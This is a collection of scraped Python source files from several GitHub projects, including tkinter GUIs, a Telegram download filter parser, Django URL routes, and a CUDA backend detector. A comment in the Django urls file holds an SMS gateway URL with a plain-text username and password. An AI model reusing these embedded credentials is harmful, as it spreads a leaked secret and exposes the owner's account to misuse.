tk.Frame(gameInfo,highlightbackground=\"gray\",highlightthickness=1)\nscoreFrame.pack(side=\"right\")\nlabel1 =tk.Label(scoreFrame,text=\"Score\")\nlabel1.pack(side=\"top\")\nscoreP1 = tk.Label(scoreFrame,text=0)\nscoreP1.pack()\nscoreP2 = tk.Label(scoreFrame,text=0)\nscoreP2.pack()\n\n#Display player scores\nplayersFrame = tk.Frame(gameInfo,highlightbackground=\"gray\",highlightthickness=1)\nplayersFrame.pack(side=\"left\")\nlabel2 =tk.Label(playersFrame,text=\"Players\")\nlabel2.pack(side=\"top\")\nlabelP1 =tk.Label(playersFrame,text=\"Player 1:\")\nlabelP1.pack()\nlabelP2 =tk.Label(playersFrame,text=\"Player 2:\")\nlabelP2.pack()\n\nresetFrame = tk.Frame(game,pady=5)\nresetFrame.pack(fill=\"x\")\nresetBtn = tk.Button(resetFrame,text=\"Reset game\",command=game.resetGame)\nresetBtn.pack()\n\ngame.inputNamesWindow()\n\ngame.mainloop()\n","repo_name":"odavidsons/tictactoe-GUI-python","sub_path":"tictactoeGUI.py","file_name":"tictactoeGUI.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5914897063","text":"\"\"\"Filter for download\"\"\"\n\nimport re\nfrom datetime import datetime\nfrom typing import Any, Optional, Tuple\n\nfrom ply import lex, yacc\n\nfrom utils.format import get_byte_from_str\nfrom utils.meta_data import MetaData, NoneObj, ReString\n\n\n# pylint: disable = R0904\nclass BaseFilter:\n \"\"\"for normal filter\"\"\"\n\n def __init__(self, debug: bool = False):\n \"\"\"\n Parameters\n ----------\n debug: bool\n If output debug info\n\n \"\"\"\n self.names: dict = {}\n self.debug = debug\n # Build the lexer and parser\n # lex.lex(module=self)\n self.lexer = lex.lex(module=self)\n self.yacc = yacc.yacc(module=self)\n\n def reset(self):\n \"\"\"Reset all symbol\"\"\"\n self.names.clear()\n\n def exec(self, filter_str: str) -> Any:\n \"\"\"Exec filter str\"\"\"\n # ) #\n # return yacc.parse(filter_str, debug=self.debug)\n return self.yacc.parse(filter_str, debug=self.debug)\n\n def _output(self, output_str: str):\n \"\"\"For print debug info\"\"\"\n if self.debug:\n print(output_str)\n\n reserved = {\n \"and\": \"AND\",\n \"or\": \"OR\",\n }\n\n tokens = (\n \"NAME\",\n \"NUMBER\",\n \"GE\",\n \"LE\",\n \"LOR\",\n \"LAND\",\n \"STRING\",\n \"RESTRING\",\n \"BYTE\",\n \"EQ\",\n \"NE\",\n \"TIME\",\n \"AND\",\n \"OR\",\n )\n\n literals = [\"=\", \"+\", \"-\", \"*\", \"/\", \"(\", \")\", \">\", \"<\"]\n\n # t_NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'\n t_GE = r\">=\"\n t_LE = r\"<=\"\n t_LOR = 
r\"\\|\\|\"\n t_LAND = r\"&&\"\n t_EQ = r\"==\"\n t_NE = r\"!=\"\n\n def t_BYTE(self, t):\n r\"\\d{1,}(B|KB|MB|GB|TB)\"\n t.value = get_byte_from_str(t.value)\n t.type = \"NUMBER\"\n return t\n\n def t_TIME(self, t):\n r\"\\d{4}-\\d{1,2}-\\d{1,2}[ ]{1,}\\d{1,2}:\\d{1,2}:\\d{1,2}\"\n t.value = datetime.strptime(t.value, \"%Y-%m-%d %H:%M:%S\")\n return t\n\n def t_STRING(self, t):\n r\"'.*?'\"\n # r\"'([^\\\\']+|\\\\'|\\\\\\\\)*'\"\n t.value = t.value[1:-1]\n return t\n\n def t_RESTRING(self, t):\n r\"r'.*?'\"\n # r\"r'([^\\\\']+|\\\\'|\\\\\\\\)*'\"\n t.value = t.value[2:-1]\n return t\n\n def t_NAME(self, t):\n r\"[a-zA-Z_][a-zA-Z0-9_]*\"\n t.type = BaseFilter.reserved.get(t.value, \"NAME\")\n return t\n\n def t_NUMBER(self, t):\n r\"\\d+\"\n t.value = int(t.value)\n return t\n\n t_ignore = \" \\t\"\n\n def t_newline(self, t):\n r\"\\n+\"\n t.lexer.lineno += t.value.count(\"\\n\")\n\n def t_error(self, t):\n \"\"\"print error\"\"\"\n print(f\"Illegal character '{t.value[0]}'\")\n t.lexer.skip(1)\n\n precedence = (\n (\"left\", \"LOR\", \"OR\"),\n (\"left\", \"LAND\", \"AND\"),\n (\"left\", \"EQ\", \"NE\"),\n (\"nonassoc\", \">\", \"<\", \"GE\", \"LE\"),\n (\"left\", \"+\", \"-\"),\n (\"left\", \"*\", \"/\"),\n (\"right\", \"UMINUS\"),\n )\n\n def p_statement_assign(self, p):\n 'statement : NAME \"=\" expression'\n return self.p_expression_eq(p)\n # self.names[p[1]] = p[3]\n\n def p_statement_expr(self, p):\n \"statement : expression\"\n self._output(p[1])\n p[0] = p[1]\n\n def p_expression_binop(self, p):\n \"\"\"expression : expression '+' expression\n | expression '-' expression\n | expression '*' expression\n | expression '/' expression\"\"\"\n self.check_type(p)\n if isinstance(p[1], NoneObj):\n p[1] = 0\n if isinstance(p[3], NoneObj):\n p[3] = 0\n\n if p[2] == \"+\":\n p[0] = p[1] + p[3]\n elif p[2] == \"-\":\n p[0] = p[1] - p[3]\n elif p[2] == \"*\":\n p[0] = p[1] * p[3]\n elif p[2] == \"/\":\n p[0] = p[1] / p[3]\n\n self._output(f\"binop {p[1]} {p[2]} {p[3]} = {p[0]}\")\n\n def p_expression_comp(self, p):\n \"\"\"expression : expression '>' expression\n | expression '<' expression\"\"\"\n self.check_type(p)\n if isinstance(p[1], NoneObj) or isinstance(p[3], NoneObj):\n p[0] = True\n return\n\n if p[1] is None or p[3] is None:\n p[0] = False\n return\n if p[2] == \">\":\n p[0] = p[1] > p[3]\n elif p[2] == \"<\":\n p[0] = p[1] < p[3]\n\n def p_expression_uminus(self, p):\n \"expression : '-' expression %prec UMINUS\"\n p[0] = -p[2]\n\n def p_expression_ge(self, p):\n \"expression : expression GE expression\"\n self.check_type(p)\n if isinstance(p[1], NoneObj) or isinstance(p[3], NoneObj):\n p[0] = True\n return\n\n if p[1] is None or p[3] is None:\n p[0] = False\n return\n\n p[0] = p[1] >= p[3]\n self._output(f\"{p[1]} {p[2]} {p[3]} {p[0]}\")\n\n def p_expression_le(self, p):\n \"expression : expression LE expression\"\n self.check_type(p)\n if isinstance(p[1], NoneObj) or isinstance(p[3], NoneObj):\n p[0] = True\n return\n\n if p[1] is None or p[3] is None:\n p[0] = False\n return\n\n p[0] = p[1] <= p[3]\n self._output(f\"{p[1]} {p[2]} {p[3]} = {p[0]}\")\n\n def p_expression_eq(self, p):\n \"expression : expression EQ expression\"\n self.check_type(p)\n if isinstance(p[1], NoneObj) or isinstance(p[3], NoneObj):\n p[0] = True\n return\n\n if p[1] is None or p[3] is None:\n p[0] = False\n return\n\n if isinstance(p[3], ReString):\n if not isinstance(p[1], str):\n p[0] = 0\n return\n p[0] = re.fullmatch(p[3].re_string, p[1], re.MULTILINE) is not None\n self._output(f\"{p[1]} {p[2]} 
{p[3].re_string} {p[0]}\")\n elif isinstance(p[1], ReString):\n if not isinstance(p[3], str):\n p[0] = 0\n return\n p[0] = re.fullmatch(p[1].re_string, p[3], re.MULTILINE) is not None\n self._output(f\"{p[1]} {p[2]} {p[3].re_string} {p[0]}\")\n else:\n p[0] = p[1] == p[3]\n self._output(f\"{p[1]} {p[2]} {p[3]} {p[0]}\")\n\n def p_expression_ne(self, p):\n \"expression : expression NE expression\"\n self.check_type(p)\n if isinstance(p[1], NoneObj) or isinstance(p[3], NoneObj):\n p[0] = True\n return\n\n if p[1] is None or p[3] is None:\n p[0] = False\n return\n if isinstance(p[3], ReString):\n if not isinstance(p[1], str):\n p[0] = 0\n return\n p[0] = re.fullmatch(p[3].re_string, p[1], re.MULTILINE) is None\n self._output(f\"{p[1]} {p[2]} {p[3].re_string} {p[0]}\")\n elif isinstance(p[1], ReString):\n if not isinstance(p[3], str):\n p[0] = 0\n return\n p[0] = re.fullmatch(p[1].re_string, p[3], re.MULTILINE) is None\n self._output(f\"{p[1]} {p[2]} {p[3].re_string} {p[0]}\")\n else:\n p[0] = p[1] != p[3]\n self._output(f\"{p[1]} {p[2]} {p[3]} = {p[0]}\")\n\n def p_expression_group(self, p):\n \"expression : '(' expression ')'\"\n p[0] = p[2]\n\n def p_expression_number(self, p):\n \"expression : NUMBER\"\n p[0] = p[1]\n\n def p_expression_time(self, p):\n \"expression : TIME\"\n p[0] = p[1]\n\n def p_expression_byte(self, p):\n \"expression : BYTE\"\n p[0] = p[1]\n\n def p_expression_name(self, p):\n \"expression : NAME\"\n try:\n p[0] = self.names[p[1]]\n except Exception as e:\n self._output(f\"Undefined name '{p[1]}'\")\n raise ValueError(f\"Undefined name {p[1]}\") from e\n # FIXME: not support not exist name\n # p[0] = NoneObj()\n\n def p_expression_lor(self, p):\n \"expression : expression LOR expression\"\n p[0] = p[1] or p[3]\n\n def p_expression_land(self, p):\n \"expression : expression LAND expression\"\n p[0] = p[1] and p[3]\n\n def p_expression_or(self, p):\n \"expression : expression OR expression\"\n p[0] = p[1] or p[3]\n\n def p_expression_and(self, p):\n \"expression : expression AND expression\"\n p[0] = p[1] and p[3]\n\n def p_expression_string(self, p):\n \"expression : STRING\"\n p[0] = p[1]\n\n def p_expression_restring(self, p):\n \"expression : RESTRING\"\n p[0] = ReString(p[1])\n self._output(\"RESTRING : \" + p[0].re_string)\n\n # pylint: disable = C0116\n def p_error(self, p):\n if p:\n raise ValueError(f\"Syntax error at '{p.value}'\")\n\n raise ValueError(\"Syntax error at EOF\")\n\n def check_type(self, p):\n \"\"\"Check filter type if is right\"\"\"\n if p[1] is None or p[1] is NoneObj or p[3] is None or p[3] is NoneObj:\n return\n if isinstance(p[1], str):\n if not isinstance(p[3], str) and not isinstance(p[3], ReString):\n raise ValueError(f\"{p[1]} is str but {p[3]} is not\")\n elif isinstance(p[1], int):\n if not isinstance(p[3], int):\n raise ValueError(f\"{p[1]} is int but {p[3]} is not\")\n elif isinstance(p[1], bool):\n if not isinstance(p[3], bool):\n raise ValueError(f\"{p[1]} is bool but {p[3]} is not\")\n elif isinstance(p[1], datetime):\n if not isinstance(p[3], datetime):\n raise ValueError(f\"{p[1]} is datetime but {p[3]} is not\")\n\n\nclass Filter:\n \"\"\"filter for telegram download\"\"\"\n\n def __init__(self):\n self.filter = BaseFilter()\n\n def set_meta_data(self, meta_data: MetaData):\n \"\"\"Set meta data for filter\"\"\"\n self.filter.reset()\n self.filter.names = meta_data.data()\n\n def set_debug(self, debug: bool):\n \"\"\"Set Filter Debug Model\"\"\"\n self.filter.debug = debug\n\n def exec(self, filter_str: str) -> bool:\n 
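# A usage sketch (the metadata field names here are hypothetical and depend on the MetaData passed in):\n        #   flt = Filter(); flt.set_meta_data(meta); flt.exec(\"file_size >= 10MB and file_name != 'a.txt'\")\n        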
\"\"\"Exec filter str\"\"\"\n\n if self.filter.names:\n res = self.filter.exec(filter_str)\n if isinstance(res, bool):\n return res\n return False\n raise ValueError(\"meta data cannot be empty!\")\n\n def check_filter(self, filter_str: str) -> Tuple[bool, Optional[str]]:\n \"\"\"check filter str\"\"\"\n try:\n return not self.exec(filter_str) is None, None\n except Exception as e:\n return False, str(e)\n","repo_name":"tangyoha/telegram_media_downloader","sub_path":"module/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":10406,"program_lang":"python","lang":"en","doc_type":"code","stars":1043,"dataset":"github-code","pt":"53"} +{"seq_id":"16453389014","text":"import unittest\n\nfrom pig_latin import piglatin_tranlator as translate\n\n\nclass TestPigLatin(unittest.TestCase):\n\n def test_word_starts_with_consonant(self):\n pig = translate('pig')\n banana = translate('banana')\n\n self.assertEqual(pig, 'igpay')\n self.assertEqual(banana, 'ananabay')\n\n def test_word_begins_with_consonnant_cluster(self):\n smile = translate('smile')\n glove = translate('glove')\n string = translate('string')\n self.assertEqual(smile, 'ilesmay')\n self.assertEqual(glove, 'oveglay')\n self.assertEqual(string, 'ingstray')\n\n def test_word_begins_with_voye(self):\n eat = translate('eat')\n omelet = translate('omelet')\n self.assertEqual(eat, 'eatay')\n self.assertEqual(omelet, 'omeletay')\n \n def test_full_sentence(self):\n result = translate('Hello, my name is Alice.')\n self.assertEqual(result, 'Ellohay, ymay amenay isay Aliceay.')\n \n def test_non_string_input(self):\n result = translate(392837263)\n self.assertEqual(result, 'The phrase to translate should be a string')\n\n def test_empty_string(self):\n result = translate('')\n self.assertEqual(result, '')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"thiernomoudou/es_challenge","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1316931128","text":"#! 
python3\n\n\n\n\n# from AF_form_910 import Write_AF_form_910\nimport tkinter\nfrom tkinter import ttk\nimport os\nimport tkinter as tk\nfrom tkinter import font as tkFont\nimport extractExcelFileInfo.getExcelFileInfo\nimport AF_form_910.AF_form_910\nimport AF_form_911.AF_form_911\nimport Form_4.Form_4\n\ncurrentFilePath = os.path.dirname(os.path.abspath(__file__))\nreferencePath = os.path.join(currentFilePath, 'reference')\nexcelFilePath = os.path.join(referencePath, 'ALPHA_ROSTER_FIELDS.xlsm')\nexcelFileInfo = extractExcelFileInfo.getExcelFileInfo.getExcelFileInfo(excelFilePath)\n# form910FolderPath = os.path.join(currentFilePath, 'AF_form_910')\n# form910Path = os.path.join(form910FolderPath, 'AF_form_910.pdf')\n\n \nNORM_FONT = (\"Helvetica\", 10)\nBIG_FONT = (\"Helvetica\", 30)\n# helv36 = tkFont.Font(family='Helvetica', size=36)\ndef create_GUI():\n # root = tkinter.Tk()\n root = tk.Tk()\n root.geometry('450x250')\n root.title(\"Automated Form Filler\")\n root.config(bg='#FF2400')\n root.state('zoomed')\n return root\nroot = create_GUI()\n \n\ndef create_left_frame(root):\n leftSideFrameVariable = tkinter.Frame(root)\n leftSideFrameVariable.grid(row = 0, column = 0)\n # leftSideFrameVariable.config(bg='#F2B90C')\n return leftSideFrameVariable\nleftSideFrameVariable = create_left_frame(root)\n\ndef create_right_frame(root):\n rightSideFrameVariable = tkinter.Frame(root)\n rightSideFrameVariable.grid(row = 0, column = 1)\n scrollbarVariable = tkinter.Scrollbar(\n rightSideFrameVariable,\n orient = tkinter.VERTICAL)\n listBoxVariable = tkinter.Listbox(\n rightSideFrameVariable,\n width = 50,\n yscrollcommand = scrollbarVariable.set,\n selectmode = tkinter.MULTIPLE) #tkinter.EXTENDED)\n scrollbarVariable.config(command = listBoxVariable.yview)\n scrollbarVariable.pack(side = tkinter.RIGHT, fill = tkinter.Y)\n listBoxVariable.pack()\n return listBoxVariable\n# create_right_frame(root)\nlistBoxVariable = create_right_frame(root)\nbuttonVariable = tkinter.IntVar()\nforms = ('Form 910 (AB - TSgt EPR)', 'Form 911 (MSgt - SMSgt EPR)', 'Form 4 (Reenlistment)')\noptionVar = tkinter.StringVar()\nranks = ['AB', 'AIC', 'SRA', 'SSG', 'TSG', 'MSG', 'SMSgt']\nnameList = []\nrankList = []\n\n\ndef determine_program_to_run():\n optionMenuValue = optionVar.get()\n if optionMenuValue == 'Form 910 (AB - TSgt EPR)':\n programToStart = 'AF_form_910'\n elif optionMenuValue == 'Form 911 (MSgt - SMSgt EPR)':\n programToStart = 'AF_form_911'\n elif optionMenuValue == 'Form 4 (Reenlistment)':\n programToStart = 'Form_4_reenlistment'\n else:\n programToStart = ''\n return programToStart\n\n\n\n\n\nformOptionMenu = ttk.OptionMenu(\n leftSideFrameVariable, \n optionVar, \n 'Choose form', \n *forms)\nbuttonLabel = tkinter.Label(\n leftSideFrameVariable,\n text = 'Choose:')\nbutton1 = tkinter.Radiobutton(\n leftSideFrameVariable,\n text = 'By Rank',\n variable = buttonVariable,\n value = 1,\n justify='left',\n command=lambda: put_either_rank_or_names_into_listbox(button1))\nbutton2 = tkinter.Radiobutton(\n leftSideFrameVariable,\n text = 'By Name',\n variable = buttonVariable,\n value = 2,\n justify='left',\n command=lambda: put_either_rank_or_names_into_listbox(button2))\nrunButton = tkinter.Button(\n leftSideFrameVariable,\n text = 'Run Program',\n command = lambda: runProgram(processingLabel, excelFileInfo, referencePath))\nprocessingLabel = tkinter.Label(\n leftSideFrameVariable,\n text = '')\n\ndef left_side_button_placement(formOptionMenu, button1, button2, runButton, processingLabel):\n formOptionMenu.grid(row = 
0, column = 0, padx = 40, pady = 10)\n    button1.grid(row = 3, column = 0)\n    button2.grid(row = 4, column = 0)\n    runButton.grid(row = 5, column = 0, padx = 100, pady = 10)\n    processingLabel.grid(row = 6, column = 0)\nleft_side_button_placement(formOptionMenu, button1, button2, runButton, processingLabel)\n\n\n\ndef runProgram(processingLabel, excelFileInfo, referencePath): \n    programToStart = determine_program_to_run()\n    rankOrName = choose_radio_button()\n    selectedItems = []\n    excelColumnToSearch = 0\n    for i in listBoxVariable.curselection():\n        selectedItem = listBoxVariable.get(i)\n        selectedItems.append(selectedItem)\n\n    if rankOrName == 'rank':\n        excelColumnToSearch = 3\n    elif rankOrName == 'name':\n        excelColumnToSearch = 1\n\n    if programToStart == '':\n        textDisplayed = 'You must select a form'\n    elif buttonVariable.get() not in (1, 2):\n        textDisplayed = 'You must make at least 1 choice of rank or name'\n    elif selectedItems == []:\n        textDisplayed = (\"Make at least 1 %s choice\" % (rankOrName))\n    else:\n        textDisplayed = ''\n    processingLabel.configure(text = textDisplayed)\n    if programToStart != '' and rankOrName != '' and selectedItems != []:\n        if programToStart == 'AF_form_910':\n            AF_form_910.AF_form_910.Write_AF_form_910(excelFileInfo, referencePath, selectedItems, excelColumnToSearch)\n        elif programToStart == 'AF_form_911':\n            AF_form_911.AF_form_911.Write_AF_form_911(excelFileInfo, referencePath, selectedItems, excelColumnToSearch) \n        elif programToStart == 'Form_4_reenlistment':\n            Form_4.Form_4.Write_Form_4(excelFileInfo, referencePath, selectedItems, excelColumnToSearch) \n\n# This method places either the ranks or the names into the field once either radio button is pressed. Called as an argument by the radio buttons\ndef put_either_rank_or_names_into_listbox(buttonPressed):\n    listBoxVariable.delete(0, tkinter.END)\n\n    if buttonPressed == button1:\n        \n        for j in range(len(ranks)):\n            listBoxVariable.insert(tkinter.END, ranks[j])\n        \n    elif buttonPressed == button2:\n        names = [] #this needs to be its own method\n        i = 2\n        while str((excelFileInfo.cell(row = i, column = 1)).value) != '':\n            currentName = str((excelFileInfo.cell(row = i, column = 1)).value)\n            if currentName == 'None':\n                break\n            else:\n                names.append(currentName)\n            i += 1\n        names.sort()\n        # extractExcelFileInfo.getExcelFileInfo.getExcelFileInfo()\n        for i in range(len(names)):\n            listBoxVariable.insert(tkinter.END, names[i])\ndef choose_radio_button():\n    if buttonVariable.get() == 1:\n        rankOrName = 'rank'\n        textDisplayed = rankOrName\n    elif buttonVariable.get() == 2:\n        rankOrName = 'name' \n        textDisplayed = rankOrName \n    else:\n        textDisplayed = 'You must choose either by rank or by name'\n        rankOrName = ''\n    processingLabel.configure(text = textDisplayed)\n    return rankOrName\n\n# def error_message_popup(msg):\n#     popup = tk.Tk()\n#     popup.wm_title(\"!\")\n#     label = ttk.Label(popup, text=msg, font=NORM_FONT)\n#     label.pack(side=\"top\", fill=\"x\", pady=100, padx=200)\n#     B1 = ttk.Button(popup, text=\"Okay\", command = popup.destroy)\n#     B1.pack()\n#     popup.mainloop()\n\nroot.mainloop()\n","repo_name":"morganmorris1953/Form_Filler","sub_path":"FormFiller/FormFiller.py","file_name":"FormFiller.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18229117191","text":"from typing import List\n\n\nclass Solution:\n    def largestRectangleArea(self, heights: List[int]) -> int:\n\n        if not heights:\n            return 0\n\n        number_of_bars = len(heights)\n\n        output = []\n\n        for 
i in range(number_of_bars):\n current_bar_height = heights[i]\n counter = 1\n for j in range(i, number_of_bars-1):\n if current_bar_height <= heights[j + 1]:\n counter += 1\n else:\n break\n for k in range(i, 0, -1):\n if current_bar_height <= heights[k - 1]:\n counter += 1\n else:\n break\n\n output.append(current_bar_height * counter)\n\n return max(output) if output and (max(output) > max(heights)) else max(heights)\n\nheights = [5,5,1,7,1,1,5,2,7,6]\ns= Solution()\nprint(s.largestRectangleArea(heights))","repo_name":"jayati-naik/Leetcode-Recursion-II","sub_path":"LargestRectangle.py","file_name":"LargestRectangle.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4057013593","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\n\nfrom .views import *\n\n# otpmsg=\"http://panel.adcomsolution.in/http-api.php?username=varun&password=varun123&senderid=LUCSON&route=1&number=<str:pk>&message=<str:pk>\"\n# booking_otp=\"http://panel.adcomsolution.in/http-api.php?username=varun&password=varun123&senderid=LUCSON&route=1&number=<str:pk>&message=\"\nurlpatterns = [\n path('User/Register/', user_register, name=\"user_register\"),\n path('User/Login/', user_Login, name='UserLogin'),\n path('User/SocialRegister/', user_social_Register, name='user_social_Register'),\n path('User/SocialLogin/', user_social_Login, name='user_social_Login'),\n path('User/Edit_Profile/', user_edit_profile, name=\"user_edit_profile\"),\n path('User/ProfileView/', user_detail_view, name=\"user_detail_view\"),\n path('User/Register_otp/', registerOTP, name=\"registerOTP\"),\n path('User/forgot_password/', user_forgot_password, name=\"forgot_password\"),\n path('User/Status/', user_status_change, name=\"user_status_change\"),\n\n path('User/ChangePassword/', user_change_password, name=\"user_change_password\"),\n path('UserWallet/AddMoney/', user_wallet_add_money, name=\"uw_add_money\"),\n path('UserWallet/CutMoney/', user_wallet_cut_money, name=\"uw_cut_money\"),\n path('UserWallet/Detail/', userwallet_detail_view, name=\"uw_detail\"),\n path('UserWallet/transaction_history/', userwallet_transaction_history,\n name=\"userwallet_transaction_history\"),\n\n path('Vehicle/View/', vehicle_details_view, name=\"v_view\"),\n path('Vehicles/View/', vehicles_view, name=\"vs_view\"),\n path('Vehicle/Update/', vehicle_details_update, name=\"v_update\"),\n path('Vehicle/Add/', vehicle_details_added, name=\"v_create\"),\n path('Vehicle/Delete/', vehicle_Delete, name=\"v_delete\"),\n path('Refferal_Vehicle/Add/', refferal_vehicle_details_add, name=\"refferal_vehicle_details_add\"),\n path('Refferal_Vehicle/msg_confirm/', refferal_vehicle_msg, name=\"refferal_vehicle_msg\"),\n\n path('Vehicle_owner_vehicle/display/', vehicle_owner_vehicle_display,\n name=\"vehicle_owner_vehicle_display\"),\n path('Refferal_user_vehicle/display/', refferal_user_vehicle_display,\n name=\"refferal_user_vehicle_display\"),\n\n path('User_view/', pz_user_view, name=\"pz_user_view\"),\n path('User_create/', pz_user_create, name=\"pz_user_create\"),\n path('User_edit/', pz_user_edit, name=\"pz_user_edit\"),\n path('User_update/', pz_user_update, name=\"pz_user_update\"),\n\n path('user_activity/', user_activity, name=\"user_activity\"),\n\n path('userwallet_create_form/', userwallet_create_form, name=\"userwallet_create_form\"),\n path('userwallet_view_form/', userwallet_view_form, 
name=\"userwallet_view_form\"),\n path('userwallet_form_edit/', userwallet_form_edit, name=\"userwallet_form_edit\"),\n path('userwallet_update_form/', userwallet_update_form, name=\"userwallet_update_form\"),\n path('userwallet_delete_form/', userwallet_delete_form, name=\"userwallet_delete_form\"),\n path('userwallet_add_bonus_money/', userWallet_bonus_add, name=\"userWallet_bonus_add\"),\n\n path('UserVehicle_view/', pz_uservehicle_view, name=\"pz_uservehicle_view\"),\n path('UserVehicle_create/', pz_uservehicle_create, name=\"pz_uservehicle_create\"),\n path('UserVehicle_edit/', pz_uservehicle_edit, name=\"pz_uservehicle_edit\"),\n path('UserVehicle_update/', pz_uservehicle_update, name=\"pz_uservehicle_update\"),\n path('UserVehicle_delete/', pz_uservehicle_delete, name=\"pz_uservehicle_delete\"),\n path('user_view1/', user_view1, name=\"user_view1\"),\n path('vehicle_view1/', vehicle_view1, name=\"vehicle_view1\"),\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"deegosai/parkingzone","sub_path":"User/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20750352039","text":"import re\nimport subprocess\nfrom abc import ABC, abstractmethod\nfrom typing import Any\n\n__all__ = [\n \"ComputationBackend\",\n \"CPUBackend\",\n \"CUDABackend\",\n \"detect_computation_backend\",\n]\n\n\nclass ComputationBackend(ABC):\n @property\n @abstractmethod\n def local(self) -> str:\n ...\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, ComputationBackend):\n return self.local == other.local\n elif isinstance(other, str):\n return self.local == other\n else:\n return False\n\n def __hash__(self) -> int:\n return hash(self.local)\n\n def __repr__(self) -> str:\n return self.local\n\n @classmethod\n def from_str(cls, string: str) -> \"ComputationBackend\":\n string = string.lower()\n try:\n if string == \"cpu\":\n return CPUBackend()\n elif string.startswith(\"cu\"):\n match = re.match(r\"^cu(da)?(?P<version>[\\d.]+)$\", string)\n if match is None:\n raise Exception\n\n version = match.group(\"version\")\n if \".\" in version:\n major, minor = version.split(\".\")\n else:\n major = version[:-1]\n minor = version[-1]\n\n return CUDABackend(int(major), int(minor))\n\n except Exception:\n pass\n\n raise RuntimeError(f\"Unable to parse {string} into a computation backend\")\n\n\nclass CPUBackend(ComputationBackend):\n @property\n def local(self) -> str:\n return \"cpu\"\n\n\nclass CUDABackend(ComputationBackend):\n def __init__(self, major: int, minor: int) -> None:\n self.major = major\n self.minor = minor\n\n @property\n def local(self) -> str:\n return f\"cu{self.major}{self.minor}\"\n\n\nNVCC_RELEASE_PATTERN = re.compile(r\"release (?P<major>\\d+)[.](?P<minor>\\d+)\")\n\n\ndef detect_computation_backend() -> ComputationBackend:\n fallback = CPUBackend()\n try:\n output = (\n subprocess.check_output(\"nvcc --version\", shell=True)\n .decode(\"utf-8\")\n .strip()\n )\n match = NVCC_RELEASE_PATTERN.findall(output)\n if not match:\n return fallback\n\n major, minor = match[0]\n return CUDABackend(int(major), int(minor))\n except subprocess.CalledProcessError:\n return 
fallback\n","repo_name":"pmeier/pytorch_wheel_installer","sub_path":"pytorch_wheel_installer/computation_backend.py","file_name":"computation_backend.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"55358896","text":"import os.path\nimport time\nfrom datetime import datetime\n\nimport requests\nfrom celery.utils.log import get_task_logger\n\nfrom kpiit.providers import BaseProvider\n\nlogger = get_task_logger(__name__)\n\n\nclass UptimeRobotProvider(BaseProvider):\n \"\"\"Uptime Robot provider.\"\"\"\n\n def __init__(self, url, api_key, monitor_name):\n \"\"\"Uptime Robot provider initialization.\"\"\"\n if not url:\n raise ValueError(\"url can't be empty\")\n if not monitor_name:\n raise ValueError(\"monitor_name can't be empty\")\n\n self.url = url\n self.api_key = api_key\n self.monitor_name = monitor_name\n self.uptime_ratio = None\n self.response_time = None\n\n def collect(self):\n \"\"\"Get data from Uptime Robot.\"\"\"\n if not self.api_key:\n # Send dummy values if no API key is specified\n logger.warning(\n 'no API key specified for Uptime provider: {}'.format(\n self.monitor_name\n )\n )\n return {\n 'response_time': None,\n 'uptime_ratio': None\n }\n\n params = dict(\n custom_uptime_ratios=1,\n response_times=1\n )\n resp = self.send('getMonitors', **params)\n if resp['stat'] == 'fail':\n raise ValueError('failed to download monitor data')\n return self._update_data(resp)\n\n def _update_data(self, resp):\n \"\"\"Update uptime and response time attributes.\"\"\"\n for monitor in resp['monitors']:\n name = monitor['friendly_name']\n if name == self.monitor_name:\n self.uptime_ratio = monitor['custom_uptime_ratio']\n self.response_time = monitor['average_response_time']\n break\n return {\n 'response_time': self.response_time,\n 'uptime_ratio': self.uptime_ratio\n }\n\n def send(self, action, **kwargs):\n \"\"\"Send request to UptimeRobot API and return the JSON object.\"\"\"\n url = os.path.join(self.url, action)\n kwargs['api_key'] = self.api_key\n if 'format' not in kwargs:\n kwargs['format'] = 'json'\n if 'logs' not in kwargs:\n kwargs['logs'] = 1\n pairs = ['{}={}'.format(*item) for item in kwargs.items()]\n payload = '&'.join(pairs)\n headers = {\n 'content-type': 'application/x-www-form-urlencoded',\n 'cache-control': 'no-cache'\n }\n resp = requests.request(\n 'POST',\n url,\n data=payload,\n headers=headers\n )\n resp.raise_for_status()\n return resp.json()\n","repo_name":"inveniosoftware-contrib/kpiit","sub_path":"kpiit/providers/uptime_robot.py","file_name":"uptime_robot.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71101755689","text":"import logging\nfrom logging.handlers import TimedRotatingFileHandler\nimport os\nimport json\nimport datetime\nfrom crawler import DockerCrawler\nimport time\nimport requests\n\nSCHEDULE_ENDPOINT = '/schedule'\nCRAWL_DOCKERHUB_FREQUENCY_SECONDS = int(os.getenv(\"CRAWL_DOCKERHUB_FREQUENCY_SECONDS\", default=60))\nLOG_FOLDER = \"scheduler_logs\"\nLOG_FILE = 'scheduler.log'\nos.makedirs(LOG_FOLDER, exist_ok=True)\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s - %(name)s - %(threadName)s - %(levelname)s - %(message)s',\n handlers=[\n TimedRotatingFileHandler(\"%s/%s\" % (LOG_FOLDER, LOG_FILE), when=\"midnight\", interval=1), \n logging.StreamHandler()\n ])\n\nFRONTEND_ENDPOINT = 
